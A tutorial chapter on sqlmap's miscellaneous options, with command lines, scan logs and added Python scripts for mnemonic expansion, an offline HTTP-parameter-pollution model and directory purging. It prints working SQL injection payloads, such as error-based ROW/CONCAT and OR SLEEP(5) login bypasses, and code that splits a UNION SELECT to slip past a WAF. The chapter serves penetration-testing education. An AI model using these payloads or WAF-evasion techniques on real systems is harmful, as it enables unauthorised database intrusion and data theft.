18. Miscellaneous
1. Using shorthand (mnemonics)
Parameter:-z
Some combinations of options are used over and over, such as "--batch --random-agent --ignore-proxy --technique=BEU". Typing such a long string every time is tedious, so sqlmap provides a shorthand option, "-z", to shorten the command line.
With "-z", each option is written as just its first few letters; "--batch", for example, becomes "bat". The only rule is that the abbreviation must identify a single option unambiguously. Mnemonics are separated by commas, and an option that takes a value is written as "name=value". For example:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
can be abbreviated as:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
Another example:
python sqlmap.py --batch --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
can be abbreviated as:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
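To make the "must be unambiguous" rule concrete, here is an added example (not sqlmap's own code) of the prefix matching that -z relies on. The option table is a constructed subset of sqlmap's options, not the real one; the case- and hyphen-insensitive comparison is inferred from the manual's "randoma" example above; and refusing an ambiguous prefix outright is this script's choice, so check your sqlmap version before assuming it behaves identically.

```python
"""Expand sqlmap-style -z mnemonics into full command-line options.

Added example, not sqlmap's own implementation. KNOWN_LONG_OPTIONS and
KNOWN_SHORT_OPTIONS are a constructed subset used only to show the rule.
"""

# Constructed subset of sqlmap long options (written without the leading "--").
KNOWN_LONG_OPTIONS = [
    "batch", "random-agent", "ignore-proxy", "technique", "flush-session",
    "dump", "dump-all", "dbs", "tables", "tamper", "threads", "time-sec",
]
# Short options are matched exactly and case-sensitively (-D and -d differ).
KNOWN_SHORT_OPTIONS = ["u", "r", "m", "g", "D", "T", "C"]


def _norm(name):
    # Comparison ignores case and hyphens, so "randoma" matches "random-agent".
    return name.replace("-", "").lower()


def resolve_mnemonic(token):
    """Map one mnemonic ('bat', 'tec=BEU', 'D=testdb') to (option, value).

    An exact name wins over longer options sharing it ("dump" vs "dump-all");
    otherwise the mnemonic must be a prefix of exactly one known option.
    """
    name, sep, value = token.partition("=")
    value = value if sep else None
    if name in KNOWN_SHORT_OPTIONS:
        return "-" + name, value
    key = _norm(name)
    exact = [opt for opt in KNOWN_LONG_OPTIONS if _norm(opt) == key]
    if exact:
        return "--" + exact[0], value
    matches = [opt for opt in KNOWN_LONG_OPTIONS if _norm(opt).startswith(key)]
    if len(matches) == 1:
        return "--" + matches[0], value
    if not matches:
        raise ValueError("mnemonic %r matches no option" % token)
    raise ValueError("mnemonic %r is ambiguous: %s"
                     % (token, ", ".join("--" + m for m in matches)))


def expand_mnemonics(spec):
    """Expand the comma-separated -z string into argv-style tokens."""
    argv = []
    for token in spec.split(","):
        token = token.strip()
        if not token:
            continue
        opt, value = resolve_mnemonic(token)
        if value is None:
            argv.append(opt)
        elif opt.startswith("--"):
            argv.append("%s=%s" % (opt, value))
        else:
            argv.extend([opt, value])   # short options take the value as the next token
    return argv


if __name__ == "__main__":
    print(" ".join(expand_mnemonics("ign,flu,bat,tec=U,dump,D=testdb,T=users")))
```

Both abbreviated command lines from the text expand back to their long forms; a mnemonic such as "ta" (tables? tamper?) or "dum" (dump? dump-all?) is rejected instead of silently picking one, which is the failure mode to watch for when you shorten options aggressively.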
2. Alarm when injection point is successfully detected
Parameter:--alert
This option runs a shell command of your choice each time a new injection point is found; the command is given as the option's argument. For example:
python sqlmap.py -r data.txt --alert "notify-send 'Vulnerability found'"
Part of the output:
[18:59:36] [INFO] GET parameter 'couno' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="001")
[18:59:36] [INFO] executing alerting shell command(s) ('notify-send 'Vulnerability found'')
The command used here, notify-send, is the desktop notification tool on Ubuntu; any command the shell can run will do.
3. Set the answer to the question
Parameter:--answers
When running non-interactively with "--batch", every prompt is answered with its default value. If you want non-interactive mode but a different answer to a particular prompt, use "--answers". Each entry has the form "keyword=answer", where the keyword is a word that appears in the prompt text; separate multiple entries with commas. For example:
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
Part of the output:
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
4. A "beep" sound is emitted when the injection point is successfully detected
Parameter:--beep
With this option sqlmap sounds a beep whenever an injection point is found. This is especially useful when you are scanning a large number of targets from a file with "-m" and are not watching the console.
5. Clear the temporary tables and custom functions created by Sqlmap
Parameter:--cleanup
It is strongly recommended to use this option once testing is finished: sqlmap then drops the temporary tables and user-defined functions it created and removes, as far as it can, the traces it left on the DBMS and the file system. Note that it can only clean up what the current session knows it created, so run it with the same session (or -s file) that was used for the test.
6. Check dependencies
Parameter:--dependencies
Some sqlmap features rely on third-party libraries, and if a library is missing sqlmap only exits with an error at the moment that feature is used. This option checks up front whether the required third-party libraries are installed, for example:
python sqlmap.py --dependencies
Some of the output is as follows:
[*] starting at 19:16:05
[19:16:05] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS 'Firebird'. Download from http://kinterbasdb.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Sybase'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS 'Oracle'. Download from http://cx-oracle.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS 'PostgreSQL'. Download from http://initd.org/psycopg/
[19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'IBM DB2'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS 'HSQLDB'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'Informix'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS 'Microsoft Access'. Download from https://github.com/mkleehammer/pyodbc
[19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Microsoft SQL Server'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires 'python-impacket' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
[19:16:05] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[19:16:05] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
[*] shutting down at 19:16:05
As you can see, the third-party libraries I am missing are mainly the ones used to connect directly to a database.
7. Turn off color output
Parameter:--disable-coloring
This option turns off the ANSI colour codes in the console output, which is useful when the output is redirected to a file or piped into a tool that does not understand escape sequences.
8. Specify a page that uses Google dork results
Parameter:--gpage
By default, "-g" takes the first 100 Google dork results for injection testing. Used together with "-g", this option lets you pick which page of Google dork results to use instead.
9. Polluting with HTTP parameters
Parameter:--hpp
HTTP parameter pollution (HPP) is a technique for bypassing WAF/IPS/IDS devices: the injection payload is split across several copies of the same parameter, so that no single value looks malicious, and the back end reassembles it. It is especially effective on ASP/IIS and ASP.NET/IIS, which concatenate repeated parameters. If you suspect the target is protected by a WAF/IPS/IDS, try this option.
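Because the effect depends entirely on how the back end merges repeated parameters, here is an added example (not sqlmap's code, and not sqlmap's exact splitting scheme) that models the classic HPP split with block comments against a deliberately naive per-value WAF rule. The join rules for ASP/IIS (concatenate with ", "), PHP (last value) and Java servlets (first value) are the commonly documented behaviours; treat them as assumptions and verify them on the target you are testing.

```python
"""HTTP parameter pollution (HPP) modelled offline.

Added example, not part of sqlmap. Shows why a payload split across repeated
parameters slips past a rule that inspects values one at a time, and why the
trick only reassembles correctly on back ends that concatenate duplicates.
"""
import re
from urllib.parse import parse_qs, quote

# Assumed merge behaviour of common back ends for a repeated parameter.
JOIN_RULES = {
    "asp_iis": lambda values: ", ".join(values),  # ASP / ASP.NET on IIS: concatenated with ", "
    "php": lambda values: values[-1],             # PHP: last occurrence wins
    "jsp": lambda values: values[0],              # Servlet getParameter(): first occurrence wins
}

# A deliberately naive WAF rule of the kind HPP is meant to slip past:
# it looks for UNION ... SELECT inside a single parameter value.
WAF_PATTERN = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def pollute(param, original, payload):
    """Split `payload` over repeated copies of `param`.

    Each word goes into its own copy, wrapped in /* ... */ so that the ", "
    an IIS back end inserts between copies lands inside a SQL comment.
    Returns the raw query string (spaces percent-encoded, comment chars kept).
    """
    words = payload.split()
    pieces = [original + "/*"]
    pieces += ["*/" + w + "/*" for w in words[:-1]]
    pieces.append("*/" + words[-1])
    return "&".join("%s=%s" % (param, quote(p, safe="*/,")) for p in pieces)


def waf_blocks(query_string):
    """True if the WAF rule fires on any single parameter value."""
    values = parse_qs(query_string, keep_blank_values=True)
    return any(WAF_PATTERN.search(v) for vs in values.values() for v in vs)


def backend_value(query_string, param, platform):
    """The value the application code finally receives for `param`."""
    values = parse_qs(query_string, keep_blank_values=True).get(param, [])
    return JOIN_RULES[platform](values)


def effective_sql(value):
    """What the DBMS evaluates once block comments are stripped (whitespace collapsed)."""
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", value)).strip()


if __name__ == "__main__":
    plain = "id=1 UNION SELECT 1,2,3"
    polluted = pollute("id", "1", "UNION SELECT 1,2,3")
    print("plain blocked:   ", waf_blocks(plain))
    print("polluted blocked:", waf_blocks(polluted))
    for platform in JOIN_RULES:
        merged = backend_value(polluted, "id", platform)
        print("%-8s receives %r -> SQL %r" % (platform, merged, effective_sql(merged)))
```

On the modelled IIS back end the four fragments merge into "1/*, */UNION/*, */SELECT/*, */1,2,3", which MySQL reads as "1 UNION SELECT 1,2,3" after comment removal, while the WAF never saw UNION and SELECT in the same value. On the PHP and servlet models only one fragment survives and the query is simply broken, which is the practical reason the text calls the option platform-specific.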
10. Thoroughly detect Waf/ips/ids
Parameter:--identify-waf
sqlmap can fingerprint the WAF/IPS/IDS product protecting the target so that you can react appropriately, for example by adding a suitable "--tamper" script. It currently has detection scripts for more than 30 different products, such as Airlock and Barracuda WAF; the scripts live in the "waf" subdirectory of the installation directory.
The target of the following example is MySQL, protected by modsecurity WAF:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
Some of the output is as follows:
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
Parameter:--skip-waf
By default sqlmap sends a dummy SQL injection payload at the start of a run to check whether the target is protected by a WAF/IPS/IDS. If that probe causes problems (for example, it gets your address blocked), disable it with "--skip-waf".
11. Emulate your Smartphone
Parameter:--mobile
Some websites return different content to smartphones than to desktop browsers. To test the smartphone version of such a site you can set a smartphone User-Agent yourself, or more simply use this option: sqlmap then asks which popular phone it should imitate, for example:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
12. Offline mode (only using session data)
Parameter:--offline
With this option sqlmap works only from the data stored in a previous session and sends no requests at all to the target.
13. Show page weights in Google dork
Parameter:--page-rank
Used together with "-g"; sqlmap makes additional requests to Google and displays the page rank (PR) of each result.
14. Safely remove all content from the output directory
Parameter:--purge-output
Use this option when you want to delete everything in the output directory securely. "Securely" means the files are not simply unlinked: their contents are first overwritten with random data and truncated, file and directory names are renamed to random values, and only after all of that is the tree deleted. Nothing remains in the output directory afterwards. (In current sqlmap releases the option is named "--purge".) For example:
python sqlmap.py --purge-output -v 3
Some of the output is as follows:
[*] starting at 19:51:36
[19:51:36] [DEBUG] cleaning up configuration parameters
[19:51:36] [INFO] purging content of directory '/home/werner/.sqlmap/output'...
[19:51:36] [DEBUG] changing file attributes
[19:51:36] [DEBUG] writing random data to files
[19:51:36] [DEBUG] truncating files
[19:51:36] [DEBUG] renaming filenames to random values
[19:51:36] [DEBUG] renaming directory names to random values
[19:51:36] [DEBUG] deleting the whole directory tree
[*] shutting down at 19:51:36
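The debug log above is a procedure, and the steps are worth seeing as code. The following is an added example (not sqlmap's implementation) that performs the same sequence on a directory: make entries writable, overwrite file contents with random bytes, truncate, rename files and directories to random names, then delete the tree. The sample output tree it builds under a temporary directory is constructed for the demonstration.

```python
"""Secure purge of an output directory, step for step as --purge-output logs it.

Added example, not sqlmap's own code. demo() creates a constructed sample
tree in a temporary directory so that the script runs offline.
"""
import os
import random
import shutil
import stat
import string
import tempfile


def _random_name(length=12):
    alphabet = string.ascii_lowercase + string.digits
    return "".join(random.choice(alphabet) for _ in range(length))


def purge_directory(root):
    """Destroy `root` in the order the --purge-output debug log shows.

    Symbolic links are unlinked without being followed, so nothing outside
    `root` is ever overwritten. Returns the number of regular files wiped.
    """
    wiped = 0
    # Bottom-up walk: files and subdirectories are handled before their parent.
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                os.unlink(path)
                continue
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)            # changing file attributes
            size = os.path.getsize(path)
            with open(path, "r+b") as fh:                            # writing random data to files
                fh.write(os.urandom(size))
                fh.flush()
                os.fsync(fh.fileno())
            os.truncate(path, 0)                                     # truncating files
            os.rename(path, os.path.join(dirpath, _random_name()))   # renaming filenames
            wiped += 1
        for name in dirnames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                os.unlink(path)
                continue
            os.chmod(path, stat.S_IRWXU)
            os.rename(path, os.path.join(dirpath, _random_name()))   # renaming directory names
    shutil.rmtree(root)                                              # deleting the whole directory tree
    return wiped


def demo():
    """Build a constructed sample output tree, purge it, report what happened."""
    root = tempfile.mkdtemp(prefix="sqlmap-output-")
    target_dir = os.path.join(root, "www.target.com")   # constructed, mirrors sqlmap's per-target layout
    os.makedirs(target_dir)
    with open(os.path.join(target_dir, "session.sqlite"), "wb") as fh:
        fh.write(b"dumped credentials " * 64)
    with open(os.path.join(target_dir, "log"), "wb") as fh:
        fh.write(b"[INFO] resuming back-end DBMS 'mysql'\n")
    wiped = purge_directory(root)
    return {"wiped": wiped, "root_exists": os.path.exists(root)}


if __name__ == "__main__":
    print(demo())
```

One caveat applies equally to this script and to the real option: overwriting in place only destroys the old bytes on file systems that write in place. On SSDs, journaling or copy-on-write file systems, and anything with snapshots, earlier copies of the blocks may survive, so treat the purge as best-effort rather than as forensic erasure.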
15. Quick Scan
Parameter:--smart
When there are many URLs to test (for example with "-m") and the goal is only to find out quickly whether any of them is injectable, use "--smart" for a fast heuristic scan. Only parameters for which the heuristic test provokes a DBMS error are tested further; all other parameters and URLs are skipped. For example:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
16. Use or skip payload by keyword
Parameter:--test-filter
If you only want to run payloads whose title contains a given keyword, say "ROW", use "--test-filter=ROW". Example against a MySQL target:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
Some of the output is as follows:
[xx:xx:39] [INFO] GET parameter 'id' is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---
Parameter:--test-skip
Conversely, if you want to skip every payload whose title contains a keyword, say "BENCHMARK", use "--test-skip=BENCHMARK".
17. Interactive Sqlmap Shell
Parameter:--sqlmap-shell
This option opens an interactive sqlmap shell with command history, so that repeated runs against the same host do not need the Python startup each time. For example:
$ sqlmap --sqlmap-shell
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.10#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
[*] shutting down at 20:22:47
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.10#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
sqlmap-shell> exit
18. A Simple guide for beginners
Parameter:--wizard
A guided mode for beginners that asks as few questions as possible. Enter the target URL, press Enter to accept the default answer to everything else, and at the end of the workflow you still get a correct result. For example:
$ sqlmap --wizard
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.10#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%' OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%' OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.50-0ubuntu0.14.04.1'
current user: '[email protected]'
current database: 'DSSchool'
current user is DBA: True
[*] shutting down at 20:40:07
Summary
Having read the whole official sqlmap manual, I finally have a fairly complete understanding of sqlmap. Before, I had only heard of it; now I really feel how powerful it is, and I admire its two authors all the more:
- Bernardo Damele A. G. (@inquisb)
- Miroslav Stampar (@stamparm)
References
- sqlmap official website
- sqlmap user manual
- sqlmap bulk scanning of Burp Suite request logs
- How do I get past the login page with wget?
- Note: Data retrieval over DNS in SQL injection attacks